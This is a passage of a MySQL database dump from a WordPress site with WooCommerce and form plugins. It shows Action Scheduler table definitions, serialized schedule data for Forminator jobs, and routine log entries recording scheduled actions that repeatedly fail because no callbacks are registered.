19:19:02','2025-05-17 00:49:02','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747423142;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747423142;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:37:54','2025-05-17 01:07:54',0,NULL,10),(156162,'forminator_send_export','complete','2025-05-16 19:19:02','2025-05-17 00:49:02','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747423142;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747423142;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:37:54','2025-05-17 01:07:54',0,NULL,10),(156163,'forminator_process_report','complete','2025-05-16 19:38:54','2025-05-17 01:08:54','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747424334;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747424334;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:41:39','2025-05-17 01:11:39',0,NULL,10),(156164,'forminator_send_export','complete','2025-05-16 19:38:54','2025-05-17 01:08:54','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747424334;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747424334;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:41:39','2025-05-17 01:11:39',0,NULL,10),(156165,'forminator_process_report','complete','2025-05-16 19:42:39','2025-05-17 01:12:39','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747424559;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747424559;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:45:46','2025-05-17 01:15:46',0,NULL,10),(156166,'forminator_send_export','complete','2025-05-16 19:42:39','2025-05-17 01:12:39','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747424559;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747424559;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:45:46','2025-05-17 01:15:46',0,NULL,10),(156167,'forminator_process_report','pending','2025-05-16 19:46:46','2025-05-17 01:16:46','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747424806;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747424806;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156168,'forminator_send_export','pending','2025-05-16 19:46:46','2025-05-17 01:16:46','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747424806;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747424806;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10);
/*!40000 ALTER TABLE `wp_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_claims`
--

DROP TABLE IF EXISTS `wp_actionscheduler_claims`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_claims` (
  `claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date_created_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`claim_id`),
  KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=182551 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_claims`
--

LOCK TABLES `wp_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_groups`
--

DROP TABLE IF EXISTS `wp_actionscheduler_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_groups` (
  `group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(255) NOT NULL,
  PRIMARY KEY (`group_id`),
  KEY `slug` (`slug`(191))
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_groups`
--

LOCK TABLES `wp_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_groups` VALUES (1,'action-scheduler-migration'),(2,'wc_update_product_default_cat'),(3,'wc-admin-data'),(4,'aioseo'),(5,'WCFM'),(6,'wp_mail_smtp'),(7,'woocommerce-db-updates'),(8,'woocommerce-remote-inbox-engine'),(9,'wpforms'),(10,''),(11,'forminator');
/*!40000 ALTER TABLE `wp_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_logs`
--

DROP TABLE IF EXISTS `wp_actionscheduler_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_logs` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action_id` bigint(20) unsigned NOT NULL,
  `message` text NOT NULL,
  `log_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `log_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`log_id`),
  KEY `action_id` (`action_id`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=468198 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_logs`
--

LOCK TABLES `wp_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_logs` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_logs` VALUES (4820,1755,'action created','2022-10-10 21:56:57','2022-10-11 03:26:57'),(4969,1762,'action created','2022-10-10 21:57:22','2022-10-11 03:27:22'),(4970,1763,'action created','2022-10-10 21:57:22','2022-10-11 03:27:22'),(5096,1755,'action started via WP Cron','2022-10-11 22:00:29','2022-10-12 03:30:29'),(5097,1755,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-11 22:00:29','2022-10-12 03:30:29'),(5098,1805,'action created','2022-10-11 22:00:29','2022-10-12 03:30:29'),(5108,1809,'action created','2022-10-12 03:55:20','2022-10-12 09:25:20'),(5109,1809,'action started via WP Cron','2022-10-12 03:55:21','2022-10-12 09:25:21'),(5110,1809,'action failed via WP Cron: Scheduled action for woocommerce_run_on_woocommerce_admin_updated will not be executed as no callbacks are registered.','2022-10-12 03:55:21','2022-10-12 09:25:21'),(5117,1805,'action started via WP Cron','2022-10-12 22:01:44','2022-10-13 03:31:44'),(5118,1805,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-12 22:01:44','2022-10-13 03:31:44'),(5119,1812,'action created','2022-10-12 22:01:44','2022-10-13 03:31:44'),(5135,1812,'action started via WP Cron','2022-10-14 04:44:38','2022-10-14 10:14:38'),(5136,1812,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-14 04:44:38','2022-10-14 10:14:38'),(5137,1818,'action created','2022-10-14 04:44:38','2022-10-14 10:14:38'),(5171,1830,'action created','2022-10-14 10:02:00','2022-10-14 15:32:00'),(5172,1830,'action started via Async Request','2022-10-14 10:03:14','2022-10-14 15:33:14'),(5173,1830,'action failed via Async Request: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2022-10-14 10:03:14','2022-10-14 15:33:14'),(5183,1834,'action created','2022-10-14 10:45:00','2022-10-14 16:15:00'),(5184,1834,'action started via WP Cron','2022-10-14 10:46:59','2022-10-14 16:16:59'),(5185,1834,'action failed via WP Cron: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2022-10-14 10:46:59','2022-10-14 16:16:59'),(5186,1818,'action started via WP Cron','2022-10-15 21:53:29','2022-10-16 03:23:29'),(5187,1818,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-15 21:53:29','2022-10-16 03:23:29'),(5188,1835,'action created','2022-10-15 21:53:29','2022-10-16 03:23:29'),(5198,1835,'action started via WP Cron','2022-10-17 04:00:50','2022-10-17 09:30:50'),(5199,1835,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-17 04:00:50','2022-10-17 09:30:50'),(5200,1839,'action created','2022-10-17 04:00:50','2022-10-17 09:30:50'),(5219,1762,'action started via WP Cron','2022-10-17 21:57:23','2022-10-18 03:27:23'),(5220,1762,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-10-17 21:57:23','2022-10-18 03:27:23'),(5221,1846,'action created','2022-10-17 21:57:23','2022-10-18 03:27:23'),(5222,1763,'action started via WP Cron','2022-10-17 21:57:23','2022-10-18 03:27:23'),(5223,1763,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-10-17 21:57:23','2022-10-18 03:27:23'),(5224,1847,'action created','2022-10-17 21:57:23','2022-10-18 03:27:23'),(5228,1839,'action started via WP Cron','2022-10-18 04:30:22','2022-10-18 10:00:22'),(5229,1839,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-18 04:30:22','2022-10-18 10:00:22'),(5230,1849,'action created','2022-10-18 04:30:22','2022-10-18 10:00:22'),(5246,1849,'action started via WP Cron','2022-10-19 04:30:56','2022-10-19 10:00:56'),(5247,1849,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-19 04:30:56','2022-10-19 10:00:56'),(5248,1855,'action created','2022-10-19 04:30:56','2022-10-19 10:00:56'),(5268,1855,'action started via WP Cron','2022-10-20 04:31:25','2022-10-20 10:01:25'),(5269,1855,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-20 04:31:25','2022-10-20 10:01:25'),(5270,1863,'action created','2022-10-20 04:31:25','2022-10-20 10:01:25'),(5286,1863,'action started via WP Cron','2022-10-21 10:43:39','2022-10-21 16:13:39'),(5287,1863,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-21 10:43:39','2022-10-21 16:13:39'),(5288,1869,'action created','2022-10-21 10:43:39','2022-10-21 16:13:39'),(5298,1869,'action started via WP Cron','2022-10-22 21:54:42','2022-10-23 03:24:42'),(5299,1869,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-22 21:54:42','2022-10-23 03:24:42'),(5300,1873,'action created','2022-10-22 21:54:42','2022-10-23 03:24:42'),(5310,1873,'action started via WP Cron','2022-10-23 23:34:34','2022-10-24 05:04:34'),(5311,1873,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-23 23:34:34','2022-10-24 05:04:34'),(5312,1877,'action created','2022-10-23 23:34:34','2022-10-24 05:04:34'),(5325,1846,'action started via WP Cron','2022-10-25 04:49:57','2022-10-25 10:19:57'),(5326,1846,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-10-25 04:49:57','2022-10-25 10:19:57'),(5327,1882,'action created','2022-10-25 04:49:57','2022-10-25 10:19:57'),(5328,1847,'action started via WP Cron','2022-10-25 04:49:57','2022-10-25 10:19:57'),(5329,1847,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-10-25 04:49:57','2022-10-25 10:19:57'),(5330,1883,'action created','2022-10-25 04:49:57','2022-10-25 10:19:57'),(5331,1877,'action started via WP Cron','2022-10-25 04:49:57','2022-10-25 10:19:57'),(5332,1877,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-25 04:49:57','2022-10-25 10:19:57'),(5333,1884,'action created','2022-10-25 04:49:57','2022-10-25 10:19:57'),(5346,1884,'action started via WP Cron','2022-10-26 11:59:47','2022-10-26 17:29:47'),(5347,1884,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-26 11:59:47','2022-10-26 17:29:47'),(5348,1889,'action created','2022-10-26 11:59:47','2022-10-26 17:29:47'),(5367,1889,'action started via WP Cron','2022-10-27 12:00:18','2022-10-27 17:30:18'),(5368,1889,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-27 12:00:18','2022-10-27 17:30:18'),(5369,1896,'action created','2022-10-27 12:00:18','2022-10-27 17:30:18'),(5415,1896,'action started via WP Cron','2022-10-28 12:00:19','2022-10-28 17:30:19'),(5416,1896,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-28 12:00:19','2022-10-28 17:30:19'),(5417,1912,'action created','2022-10-28 12:00:19','2022-10-28 17:30:19'),(5427,1912,'action started via WP Cron','2022-10-29 21:55:48','2022-10-30 03:25:48'),(5428,1912,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-29 21:55:48','2022-10-30 03:25:48'),(5429,1916,'action created','2022-10-29 21:55:48','2022-10-30 03:25:48'),(5439,1916,'action started via Async Request','2022-10-30 21:55:51','2022-10-31 03:25:51'),(5440,1916,'action failed via Async Request: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-30 21:55:51','2022-10-31 03:25:51'),(5441,1920,'action created','2022-10-30 21:55:51','2022-10-31 03:25:51'),(5451,1920,'action started via WP Cron','2022-10-31 21:59:34','2022-11-01 03:29:34'),(5452,1920,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-10-31 21:59:34','2022-11-01 03:29:34'),(5453,1924,'action created','2022-10-31 21:59:34','2022-11-01 03:29:34'),(5466,1882,'action started via WP Cron','2022-11-01 11:52:07','2022-11-01 17:22:07'),(5467,1882,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-11-01 11:52:07','2022-11-01 17:22:07'),(5468,1929,'action created','2022-11-01 11:52:07','2022-11-01 17:22:07'),(5469,1883,'action started via WP Cron','2022-11-01 11:52:07','2022-11-01 17:22:07'),(5470,1883,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-11-01 11:52:07','2022-11-01 17:22:07'),(5471,1930,'action created','2022-11-01 11:52:07','2022-11-01 17:22:07'),(5475,1924,'action started via WP Cron','2022-11-01 22:07:26','2022-11-02 03:37:26'),(5476,1924,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-01 22:07:26','2022-11-02 03:37:26'),(5477,1932,'action created','2022-11-01 22:07:26','2022-11-02 03:37:26'),(5488,1937,'action created','2022-11-01 22:07:43','2022-11-02 03:37:43'),(5489,1937,'action started via WP Cron','2022-11-01 22:36:59','2022-11-02 04:06:59'),(5490,1937,'action failed via WP Cron: Scheduled action for woocommerce_run_on_woocommerce_admin_updated will not be executed as no callbacks are registered.','2022-11-01 22:36:59','2022-11-02 04:06:59'),(5502,1932,'action started via WP Cron','2022-11-02 22:12:54','2022-11-03 03:42:54'),(5503,1932,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-02 22:12:54','2022-11-03 03:42:54'),(5504,1941,'action created','2022-11-02 22:12:54','2022-11-03 03:42:54'),(5520,1941,'action started via WP Cron','2022-11-04 08:09:23','2022-11-04 13:39:23'),(5521,1941,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-04 08:09:23','2022-11-04 13:39:23'),(5522,1947,'action created','2022-11-04 08:09:23','2022-11-04 13:39:23'),(5532,1947,'action started via WP Cron','2022-11-05 15:08:40','2022-11-05 20:38:40'),(5533,1947,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-05 15:08:40','2022-11-05 20:38:40'),(5534,1951,'action created','2022-11-05 15:08:40','2022-11-05 20:38:40'),(5544,1951,'action started via WP Cron','2022-11-07 05:01:01','2022-11-07 10:31:01'),(5545,1951,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-07 05:01:01','2022-11-07 10:31:01'),(5546,1955,'action created','2022-11-07 05:01:01','2022-11-07 10:31:01'),(5556,1955,'action started via WP Cron','2022-11-08 07:59:48','2022-11-08 13:29:48'),(5557,1955,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-08 07:59:48','2022-11-08 13:29:48'),(5558,1959,'action created','2022-11-08 07:59:48','2022-11-08 13:29:48'),(5571,1929,'action started via WP Cron','2022-11-08 15:28:13','2022-11-08 20:58:13'),(5572,1929,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-11-08 15:28:13','2022-11-08 20:58:13'),(5573,1964,'action created','2022-11-08 15:28:13','2022-11-08 20:58:13'),(5574,1930,'action started via WP Cron','2022-11-08 15:28:13','2022-11-08 20:58:13'),(5575,1930,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-11-08 15:28:13','2022-11-08 20:58:13'),(5576,1965,'action created','2022-11-08 15:28:13','2022-11-08 20:58:13'),(5581,1968,'action created','2022-11-08 23:48:04','2022-11-09 05:18:04'),(5582,1968,'action started via WP Cron','2022-11-08 23:48:06','2022-11-09 05:18:06'),(5583,1968,'action failed via WP Cron: Scheduled action for woocommerce_run_on_woocommerce_admin_updated will not be executed as no callbacks are registered.','2022-11-08 23:48:06','2022-11-09 05:18:06'),(5586,1959,'action started via WP Cron','2022-11-09 10:53:20','2022-11-09 16:23:20'),(5587,1959,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-09 10:53:20','2022-11-09 16:23:20'),(5588,1969,'action created','2022-11-09 10:53:20','2022-11-09 16:23:20'),(5601,1969,'action started via WP Cron','2022-11-10 11:04:36','2022-11-10 16:34:36'),(5602,1969,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-10 11:04:36','2022-11-10 16:34:36'),(5603,1974,'action created','2022-11-10 11:04:36','2022-11-10 16:34:36'),(5613,1974,'action started via WP Cron','2022-11-11 15:41:24','2022-11-11 21:11:24'),(5614,1974,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-11 15:41:24','2022-11-11 21:11:24'),(5615,1978,'action created','2022-11-11 15:41:24','2022-11-11 21:11:24'),(5625,1978,'action started via WP Cron','2022-11-12 16:44:36','2022-11-12 22:14:36'),(5626,1978,'action failed via WP Cron: Scheduled action for aioseo_cache_prune will not be executed as no callbacks are registered.','2022-11-12 16:44:36','2022-11-12 22:14:36'),(5627,1978,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-11-12 16:44:36','2022-11-12 22:14:36'),(5658,1964,'action started via WP Cron','2022-11-15 23:06:19','2022-11-16 04:36:19'),(5659,1964,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-11-15 23:06:19','2022-11-16 04:36:19'),(5660,1964,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-11-15 23:06:19','2022-11-16 04:36:19'),(5661,1965,'action started via WP Cron','2022-11-15 23:06:19','2022-11-16 04:36:19'),(5662,1965,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-11-15 23:06:19','2022-11-16 04:36:19'),(5663,1965,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-11-15 23:06:19','2022-11-16 04:36:19'),(5676,1996,'action created','2022-11-16 02:27:51','2022-11-16 07:57:51'),(5677,1997,'action created','2022-11-16 02:27:51','2022-11-16 07:57:51'),(5744,1996,'action started via WP Cron','2022-11-23 08:05:57','2022-11-23 13:35:57'),(5745,1996,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-11-23 08:05:57','2022-11-23 13:35:57'),(5746,1996,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-11-23 08:05:57','2022-11-23 13:35:57'),(5747,1997,'action started via WP Cron','2022-11-23 08:05:57','2022-11-23 13:35:57'),(5748,1997,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-11-23 08:05:57','2022-11-23 13:35:57'),(5749,1997,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-11-23 08:05:57','2022-11-23 13:35:57'),(5759,2023,'action created','2022-11-23 14:59:17','2022-11-23 20:29:17'),(5760,2024,'action created','2022-11-23 14:59:17','2022-11-23 20:29:17'),(5824,2023,'action started via WP Cron','2022-11-30 19:53:14','2022-12-01 01:23:14'),(5825,2023,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-11-30 19:53:14','2022-12-01 01:23:14'),(5826,2023,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-11-30 19:53:14','2022-12-01 01:23:14'),(5827,2024,'action started via WP Cron','2022-11-30 19:53:14','2022-12-01 01:23:14'),(5828,2024,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-11-30 19:53:14','2022-12-01 01:23:14'),(5829,2024,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-11-30 19:53:14','2022-12-01 01:23:14'),(5842,2050,'action created','2022-12-01 06:58:06','2022-12-01 12:28:06'),(5843,2051,'action created','2022-12-01 06:58:06','2022-12-01 12:28:06'),(5902,2072,'action created','2022-12-07 22:46:20','2022-12-08 04:16:20'),(5903,2072,'action started via WP Cron','2022-12-07 22:46:20','2022-12-08 04:16:20'),(5904,2072,'action failed via WP Cron: Scheduled action for woocommerce_run_on_woocommerce_admin_updated will not be executed as no callbacks are registered.','2022-12-07 22:46:20','2022-12-08 04:16:20'),(5919,2050,'action started via WP Cron','2022-12-08 07:29:55','2022-12-08 12:59:55'),(5920,2050,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-12-08 07:29:55','2022-12-08 12:59:55'),(5921,2050,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-12-08 07:29:55','2022-12-08 12:59:55'),(5922,2051,'action started via WP Cron','2022-12-08 07:29:55','2022-12-08 12:59:55'),(5923,2051,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-12-08 07:29:55','2022-12-08 12:59:55'),(5924,2051,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-12-08 07:29:55','2022-12-08 12:59:55'),(5925,2077,'action created','2022-12-08 23:04:04','2022-12-09 04:34:04'),(5926,2078,'action created','2022-12-08 23:04:04','2022-12-09 04:34:04'),(5988,2100,'action created','2022-12-14 22:53:57','2022-12-15 04:23:57'),(5989,2100,'action started via WP Cron','2022-12-15 04:13:09','2022-12-15 09:43:09'),(5990,2100,'action failed via WP Cron: Scheduled action for woocommerce_run_on_woocommerce_admin_updated will not be executed as no callbacks are registered.','2022-12-15 04:13:09','2022-12-15 09:43:09'),(6005,2077,'action started via WP Cron','2022-12-16 01:39:53','2022-12-16 07:09:53'),(6006,2077,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-12-16 01:39:53','2022-12-16 07:09:53'),(6007,2077,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-12-16 01:39:53','2022-12-16 07:09:53'),(6008,2078,'action started via WP Cron','2022-12-16 01:39:53','2022-12-16 07:09:53'),(6009,2078,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-12-16 01:39:53','2022-12-16 07:09:53'),(6010,2078,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-12-16 01:39:53','2022-12-16 07:09:53'),(6020,2108,'action created','2022-12-17 00:23:27','2022-12-17 05:53:27'),(6021,2109,'action created','2022-12-17 00:23:27','2022-12-17 05:53:27'),(6065,2125,'action created','2022-12-21 22:52:31','2022-12-22 04:22:31'),(6066,2125,'action started via WP Cron','2022-12-21 22:52:32','2022-12-22 04:22:32'),(6067,2125,'action failed via WP Cron: Scheduled action for woocommerce_run_on_woocommerce_admin_updated will not be executed as no callbacks are registered.','2022-12-21 22:52:32','2022-12-22 04:22:32'),(6091,2108,'action started via WP Cron','2022-12-24 00:28:30','2022-12-24 05:58:30'),(6092,2108,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2022-12-24 00:28:30','2022-12-24 05:58:30'),(6093,2108,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-12-24 00:28:30','2022-12-24 05:58:30'),(6094,2109,'action started via WP Cron','2022-12-24 00:28:30','2022-12-24 05:58:30'),(6095,2109,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2022-12-24 00:28:30','2022-12-24 05:58:30'),(6096,2109,'This action appears to be consistently failing. A new instance will not be scheduled.','2022-12-24 00:28:30','2022-12-24 05:58:30'),(6106,2136,'action created','2022-12-25 09:54:22','2022-12-25 15:24:22'),(6107,2137,'action created','2022-12-25 09:54:22','2022-12-25 15:24:22'),(6162,2136,'action started via WP Cron','2023-01-01 10:28:33','2023-01-01 15:58:33'),(6163,2136,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2023-01-01 10:28:33','2023-01-01 15:58:33'),(6164,2136,'This action appears to be consistently failing. A new instance will not be scheduled.','2023-01-01 10:28:33','2023-01-01 15:58:33'),(6165,2137,'action started via WP Cron','2023-01-01 10:28:33','2023-01-01 15:58:33'),(6166,2137,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2023-01-01 10:28:33','2023-01-01 15:58:33'),(6167,2137,'This action appears to be consistently failing. A new instance will not be scheduled.','2023-01-01 10:28:33','2023-01-01 15:58:33'),(6177,2159,'action created','2023-01-01 23:00:29','2023-01-02 04:30:29'),(6178,2160,'action created','2023-01-01 23:00:29','2023-01-02 04:30:29'),(6216,2174,'action created','2023-01-12 01:02:26','2023-01-12 06:32:26'),(6226,2159,'action started via WP Cron','2023-01-18 02:16:44','2023-01-18 07:46:44'),(6227,2159,'action failed via WP Cron: Scheduled action for wpforms_admin_addons_cache_update will not be executed as no callbacks are registered.','2023-01-18 02:16:44','2023-01-18 07:46:44'),(6228,2159,'This action appears to be consistently failing. A new instance will not be scheduled.','2023-01-18 02:16:44','2023-01-18 07:46:44'),(6229,2160,'action started via WP Cron','2023-01-18 02:16:44','2023-01-18 07:46:44'),(6230,2160,'action failed via WP Cron: Scheduled action for wpforms_admin_builder_templates_cache_update will not be executed as no callbacks are registered.','2023-01-18 02:16:44','2023-01-18 07:46:44'),(6231,2160,'This action appears to be consistently failing. A new instance will not be scheduled.','2023-01-18 02:16:44','2023-01-18 07:46:44'),(6234,2174,'action started via WP Cron','2023-01-18 02:16:44','2023-01-18 07:46:44'),(6235,2174,'action failed via WP Cron: Scheduled action for woocommerce_run_on_woocommerce_admin_updated will not be executed as no callbacks are registered.','2023-01-18 02:16:44','2023-01-18 07:46:44'),(6245,2181,'action created','2023-01-18 02:17:02','2023-01-18 07:47:02'),(6246,2182,'action created','2023-01-18 02:17:02','2023-01-18 07:47:02'),(6310,2181,'action started via WP Cron','2023-01-25 03:35:34','2023-01-25 09:05:34'),(6311,2181,'action failed via WP Cron: 